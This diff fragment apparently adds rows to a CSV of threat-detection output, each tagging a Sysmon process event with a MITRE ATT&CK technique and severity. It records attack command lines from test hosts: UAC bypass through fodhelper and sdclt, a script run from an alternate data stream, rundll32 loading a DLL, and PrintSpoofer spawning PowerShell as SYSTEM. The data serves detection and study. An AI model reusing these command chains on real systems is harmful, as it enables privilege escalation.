+    <TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
+    </TimeCreated>
+    <EventRecordID>110435</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3068"" ThreadID=""2232"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
+    <Data Name=""ProcessId"">6004</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
+    <Data Name=""ParentProcessId"">1428</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
+    </TimeCreated>
+    <EventRecordID>110435</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3068"" ThreadID=""2232"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
+    <Data Name=""ProcessId"">6004</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
+    <Data Name=""ParentProcessId"">1428</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:04.075706Z"">
+    </TimeCreated>
+    <EventRecordID>342416</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:04.074</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
+    <Data Name=""ProcessId"">8032</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E93B-5F33-0000-001003BA0E00</Data>
+    <Data Name=""ParentProcessId"">7920</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wermgr.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wermgr.exe -upload</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot;  /name Microsoft.BackupAndRestoreCenter ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T03:25:25.067945Z"">
+    </TimeCreated>
+    <EventRecordID>11267</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1988"" ThreadID=""228"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 03:25:24.677</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9DA4-5CD3-0000-00107F7A2F00</Data>
+    <Data Name=""ProcessId"">2920</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot;  /name Microsoft.BackupAndRestoreCenter</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
+    <Data Name=""LogonId"">0x13add</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9DA4-5CD3-0000-00102E692F00</Data>
+    <Data Name=""ParentProcessId"">3184</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\sdclt.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot;  /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T02:52:23.531513Z"">
+    </TimeCreated>
+    <EventRecordID>11242</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1988"" ThreadID=""228"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 02:52:23.515</Data>
+    <Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001004970F00</Data>
+    <Data Name=""ProcessId"">3784</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;  /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
+    <Data Name=""LogonId"">0x13add</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
+    <Data Name=""ParentProcessId"">1900</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.237600Z"">
+    </TimeCreated>
+    <EventRecordID>4965</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.213</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
+    <Data Name=""ProcessId"">6836</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c rundll32 AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
+    </TimeCreated>
+    <EventRecordID>5277</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
+    <Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
+    <Data Name=""ProcessId"">3656</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
+    <Data Name=""ParentProcessId"">8180</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-20T08:07:48.925560Z"">
+    </TimeCreated>
+    <EventRecordID>8116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2020"" ThreadID=""2088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-20 08:07:48.909</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
+    <Data Name=""ProcessId"">1440</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;cmd&quot;</Data>
+    <Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
+    <Data Name=""LogonId"">0x13529</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
+    <Data Name=""ParentProcessId"">816</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
+    </TimeCreated>
+    <EventRecordID>5277</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
+    <Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
+    <Data Name=""ProcessId"">3656</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
+    <Data Name=""ParentProcessId"">8180</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T07:46:15.215239Z"">
+    </TimeCreated>
+    <EventRecordID>8575</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1876"" ThreadID=""1444"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 07:46:15.183</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FD47-5CC7-0000-00106AF61D00</Data>
+    <Data Name=""ProcessId"">4088</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-F6A1-5CC7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-F6A1-5CC7-0000-001004550000</Data>
+    <Data Name=""ParentProcessId"">468</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe  -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
+    </TimeCreated>
+    <EventRecordID>110434</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3068"" ThreadID=""2232"">
+    </Execution>
